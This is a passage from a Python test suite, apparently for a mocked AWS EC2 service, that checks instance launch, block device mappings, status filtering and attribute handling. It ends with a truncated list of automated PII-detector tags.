ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400) + ex.value.response[""Error""][""Message""].should.equal( + ""The request must contain the parameter ebs"" + ) + + +@mock_ec2 +def test_run_instance_with_block_device_mappings_missing_size(): + ec2_client = boto3.client(""ec2"", region_name=""us-east-1"") + + kwargs = { + ""MinCount"": 1, + ""MaxCount"": 1, + ""ImageId"": EXAMPLE_AMI_ID, + ""KeyName"": ""the_key"", + ""InstanceType"": ""t1.micro"", + ""BlockDeviceMappings"": [ + {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeType"": ""standard""}} + ], + } + with pytest.raises(ClientError) as ex: + ec2_client.run_instances(**kwargs) + + ex.value.response[""Error""][""Code""].should.equal(""MissingParameter"") + ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400) + ex.value.response[""Error""][""Message""].should.equal( + ""The request must contain the parameter size or snapshotId"" + ) + + +@mock_ec2 +def test_run_instance_with_block_device_mappings_from_snapshot(): + ec2_client = boto3.client(""ec2"", region_name=""us-east-1"") + ec2_resource = boto3.resource(""ec2"", region_name=""us-east-1"") + volume_details = { + ""AvailabilityZone"": ""1a"", + ""Size"": 30, + } + + volume = ec2_resource.create_volume(**volume_details) + snapshot = volume.create_snapshot() + kwargs = { + ""MinCount"": 1, + ""MaxCount"": 1, + ""ImageId"": EXAMPLE_AMI_ID, + ""KeyName"": ""the_key"", + ""InstanceType"": ""t1.micro"", + ""BlockDeviceMappings"": [ + {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""SnapshotId"": snapshot.snapshot_id}} + ], + } + + ec2_client.run_instances(**kwargs) + + instances = ec2_client.describe_instances() + volume = instances[""Reservations""][0][""Instances""][0][""BlockDeviceMappings""][0][ + ""Ebs"" + ] + + volumes = ec2_client.describe_volumes(VolumeIds=[volume[""VolumeId""]]) + + volumes[""Volumes""][0][""Size""].should.equal(30) + volumes[""Volumes""][0][""SnapshotId""].should.equal(snapshot.snapshot_id) + + +@mock_ec2_deprecated +def test_describe_instance_status_no_instances(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + all_status = conn.get_all_instance_status() + len(all_status).should.equal(0) + + +@mock_ec2_deprecated +def test_describe_instance_status_with_instances(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"") + + all_status = conn.get_all_instance_status() + len(all_status).should.equal(1) + all_status[0].instance_status.status.should.equal(""ok"") + all_status[0].system_status.status.should.equal(""ok"") + + +@mock_ec2_deprecated +def test_describe_instance_status_with_instance_filter_deprecated(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + + # We want to filter based on this one + reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"") + instance = reservation.instances[0] + + # This is just to setup the test + conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"") + + all_status = conn.get_all_instance_status(instance_ids=[instance.id]) + len(all_status).should.equal(1) + all_status[0].id.should.equal(instance.id) + + # Call get_all_instance_status with a bad id should raise an error + with pytest.raises(EC2ResponseError) as cm: + conn.get_all_instance_status(instance_ids=[instance.id, ""i-1234abcd""]) + cm.value.code.should.equal(""InvalidInstanceID.NotFound"") + cm.value.status.should.equal(400) + cm.value.request_id.should_not.be.none + + +@mock_ec2 +def test_describe_instance_credit_specifications(): + conn = boto3.client(""ec2"", region_name=""us-west-1"") + + # We want to filter based on this one + reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1) + result = conn.describe_instance_credit_specifications( + InstanceIds=[reservation[""Instances""][0][""InstanceId""]] + ) + assert ( + result[""InstanceCreditSpecifications""][0][""InstanceId""] + == reservation[""Instances""][0][""InstanceId""] + ) + + +@mock_ec2 +def test_describe_instance_status_with_instance_filter(): + conn = boto3.client(""ec2"", region_name=""us-west-1"") + + # We want to filter based on this one + reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=3, MaxCount=3) + instance1 = reservation[""Instances""][0] + instance2 = reservation[""Instances""][1] + instance3 = reservation[""Instances""][2] + conn.stop_instances(InstanceIds=[instance1[""InstanceId""]]) + stopped_instance_ids = [instance1[""InstanceId""]] + running_instance_ids = sorted([instance2[""InstanceId""], instance3[""InstanceId""]]) + all_instance_ids = sorted(stopped_instance_ids + running_instance_ids) + + # Filter instance using the state name + state_name_filter = { + ""running_and_stopped"": [ + {""Name"": ""instance-state-name"", ""Values"": [""running"", ""stopped""]} + ], + ""running"": [{""Name"": ""instance-state-name"", ""Values"": [""running""]}], + ""stopped"": [{""Name"": ""instance-state-name"", ""Values"": [""stopped""]}], + } + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_name_filter[""running_and_stopped""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(all_instance_ids) + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_name_filter[""running""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(running_instance_ids) + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_name_filter[""stopped""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(stopped_instance_ids) + + # Filter instance using the state code + state_code_filter = { + ""running_and_stopped"": [ + {""Name"": ""instance-state-code"", ""Values"": [""16"", ""80""]} + ], + ""running"": [{""Name"": ""instance-state-code"", ""Values"": [""16""]}], + ""stopped"": [{""Name"": ""instance-state-code"", ""Values"": [""80""]}], + } + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_code_filter[""running_and_stopped""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(all_instance_ids) + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_code_filter[""running""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(running_instance_ids) + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_code_filter[""stopped""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(stopped_instance_ids) + + +@requires_boto_gte(""2.32.0"") +@mock_ec2_deprecated +def test_describe_instance_status_with_non_running_instances(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + instance1.stop() + instance2.terminate() + + all_running_status = conn.get_all_instance_status() + all_running_status.should.have.length_of(1) + all_running_status[0].id.should.equal(instance3.id) + all_running_status[0].state_name.should.equal(""running"") + + all_status = conn.get_all_instance_status(include_all_instances=True) + all_status.should.have.length_of(3) + + status1 = next((s for s in all_status if s.id == instance1.id), None) + status1.state_name.should.equal(""stopped"") + + status2 = next((s for s in all_status if s.id == instance2.id), None) + status2.state_name.should.equal(""terminated"") + + status3 = next((s for s in all_status if s.id == instance3.id), None) + status3.state_name.should.equal(""running"") + + +@mock_ec2_deprecated +def test_get_instance_by_security_group(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + + conn.run_instances(EXAMPLE_AMI_ID) + instance = conn.get_only_instances()[0] + + security_group = conn.create_security_group(""test"", ""test"") + + with pytest.raises(EC2ResponseError) as ex: + conn.modify_instance_attribute( + instance.id, ""groupSet"", [security_group.id], dry_run=True + ) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"" + ) + + conn.modify_instance_attribute(instance.id, ""groupSet"", [security_group.id]) + + security_group_instances = security_group.instances() + + assert len(security_group_instances) == 1 + assert security_group_instances[0].id == instance.id + + +@mock_ec2 +def test_modify_delete_on_termination(): + ec2_client = boto3.resource(""ec2"", region_name=""us-west-1"") + result = ec2_client.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1) + instance = result[0] + instance.load() + instance.block_device_mappings[0][""Ebs""][""DeleteOnTermination""].should.be(True) + instance.modify_attribute( + BlockDeviceMappings=[ + {""DeviceName"": ""/dev/sda1"", ""Ebs"": {""DeleteOnTermination"": False}} + ] + ) + instance.load() + instance.block_device_mappings[0][""Ebs""][""DeleteOnTermination""].should.be(False) + + +@mock_ec2 +def test_create_instance_ebs_optimized(): + ec2_resource = boto3.resource(""ec2"", region_name=""eu-west-1"") + + instance = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, EbsOptimized=True + )[0] + instance.load() + instance.ebs_optimized.should.be(True) + + instance.modify_attribute(EbsOptimized={""Value"": False}) + instance.load() + instance.ebs_optimized.should.be(False) + + instance = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, + )[0] + instance.load() + instance.ebs_optimized.should.be(False) + + +@mock_ec2 +def test_run_multiple_instances_in_same_command(): + instance_count = 4 + client = boto3.client(""ec2"", region_name=""us-east-1"") + client.run_instances( + ImageId=EXAMPLE_AMI_ID, MinCount=instance_count, MaxCount=instance_count + ) + reservations = client.describe_instances()[""Reservations""] + + reservations[0][""Instances""].should.have.length_of(instance_count) + + instances = reservations[0][""Instances""] + for i in range(0, instance_count): + instances[i][""AmiLaunchIndex""].should.be(i) + + +@mock_ec2 +def test_describe_instance_attribute(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + security_group_id = client.create_security_group( + GroupName=""test security group"", Description=""this is a test security group"" + )[""GroupId""] + client.run_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + SecurityGroupIds=[security_group_id], + ) + instance_id = client.describe_instances()[""Reservations""][0][""Instances""][0][ + ""InstanceId"" + ] + + valid_instance_attributes = [ + ""instanceType"", + ""kernel"", + ""ramdisk"", + ""userData"", + ""disableApiTermination"", + ""instanceInitiatedShutdownBehavior"", + ""rootDeviceName"", + ""blockDeviceMapping"", + ""productCodes"", + ""sourceDestCheck"", + ""groupSet"", + ""ebsOptimized"", + ""sriovNetSupport"", + ] + + for valid_instance_attribute in valid_instance_attributes: + response = client.describe_instance_attribute( + InstanceId=instance_id, Attribute=valid_instance_attribute + ) + if valid_instance_attribute == ""groupSet"": + response.should.have.key(""Groups"") + response[""Groups""].should.have.length_of(1) + response[""Groups""][0][""GroupId""].should.equal(security_group_id) + elif valid_instance_attribute == ""userData"": + response.should.have.key(""UserData"") + response[""UserData""].should.be.empty + + invalid_instance_attributes = [ + ""abc"", + ""Kernel"", + ""RamDisk"", + ""userdata"", + ""iNsTaNcEtYpE"", + ] + + for invalid_instance_attribute in invalid_instance_attributes: + with pytest.raises(ClientError) as ex: + client.describe_instance_attribute( + InstanceId=instance_id, Attribute=invalid_instance_attribute + ) + ex.value.response[""Error""][""Code""].should.equal(""InvalidParameterValue"") + ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400) + message = ""Value ({invalid_instance_attribute}) for parameter attribute is invalid. Unknown attribute."".format( + invalid_instance_attribute=invalid_instance_attribute + ) + ex.value.response[""Error""][""Message""].should.equal(message) + + +@mock_ec2 +def test_warn_on_invalid_ami(): + if settings.TEST_SERVER_MODE: + raise SkipTest(""Can't capture warnings in server mode."") + ec2 = boto3.resource(""ec2"", ""us-east-1"") + with pytest.warns( + PendingDeprecationWarning, + match=r""Could not find AMI with image-id:invalid-ami.+"", + ): + ec2.create_instances(ImageId=""invalid-ami"", MinCount=1, MaxCount=1) +",62433,"[['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.99.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['PERSON', 'conn = boto.connect_ec2'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'zone=conn.region.name'], ['LOCATION', 'test_get_paginated_instances'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'instance3'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['LOCATION', 'min_count=1'], ['LOCATION', 'min_count=1'], ['PERSON', 'min_count=1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'Boto'], ['PERSON', 'DryRun'], ['PERSON', 'test_user_data_with_run_instance'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'instance.groups.should.have.length_of(2'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'Boto'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn.detach_network_interface(""eni-attach-1234abcd'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto3.client(""ec2'], ['PERSON', 'conn = boto3.client(""ec2'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['DATE_TIME', 'test_warn_on_invalid_ami'], ['DATE_TIME', '2014-01-01'], ['DATE_TIME', '2014-01-01'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['URL', 'boto.ec2.in'], ['URL', 'six.PY'], ['URL', 'base64.de'], ['URL', 'base64.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'instance1.im'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.ru'], ['URL', 'reservation.should.be'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', 'instance.state.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.id.sh'], ['URL', 'reservation.id'], ['URL', 'instances.sh'], ['URL', 'instance.id.sh'], ['URL', 'instance.id'], ['URL', 'instance.state.sh'], ['URL', 'instance.la'], ['URL', 'time.sh'], ['URL', 'id.sh'], ['URL', 'instance.placement.sh'], ['URL', 'instance.ro'], ['URL', '.status.sh'], ['URL', 'id.should.ma'], ['URL', 'conn.ge'], ['URL', 'volume.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'volume.status.sh'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'volume.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'ex.value.re'], ['URL', 'InvalidAttachment.No'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'instance.in'], ['URL', 'boto.co'], ['URL', 'instances.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol1.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol2.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol3.at'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'mapping.sh'], ['URL', 'conn.ge'], ['URL', 'v.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'v.at'], ['URL', 'data.at'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.cr'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.region.name.sh'], ['URL', 'instance.region.na'], ['URL', 'v.status.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'instance.id'], ['URL', 'reservation.in'], ['URL', 'ids.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'token.sh'], ['URL', 'not.be.no'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'resp2.ke'], ['URL', 'boto3.cl'], ['URL', 'ec2.ru'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'ids.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation1.in'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation2.in'], ['URL', 'conn.ru'], ['URL', 'reservation3.in'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'Client.Us'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'i.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.mo'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc1.id'], ['URL', 'conn.ru'], ['URL', 'subnet1.id'], ['URL', 'reservation1.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc2.id'], ['URL', 'conn.ru'], ['URL', 'subnet2.id'], ['URL', 'reservation2.in'], ['URL', 'conn.ge'], ['URL', 'vpc1.id'], ['URL', 'reservations1.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'id.sh'], ['URL', 'vpc1.id'], ['URL', 'id.sh'], ['URL', 'subnet1.id'], ['URL', 'conn.ge'], ['URL', 'vpc2.id'], ['URL', 'reservations2.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'id.sh'], ['URL', 'vpc2.id'], ['URL', 'id.sh'], ['URL', 'subnet2.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'ip-10-0-0-1.ec2.int'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'network-interface.pr'], ['URL', 'ip-10-0-0-1.us-west-2.compute.int'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instances.sh'], ['URL', 'instance.id'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', 'instance.state.sh'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', '.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.re'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.re'], ['URL', 'instance.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], ['URL', 'm1.sm'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'm1.sm'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'm1.sm'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 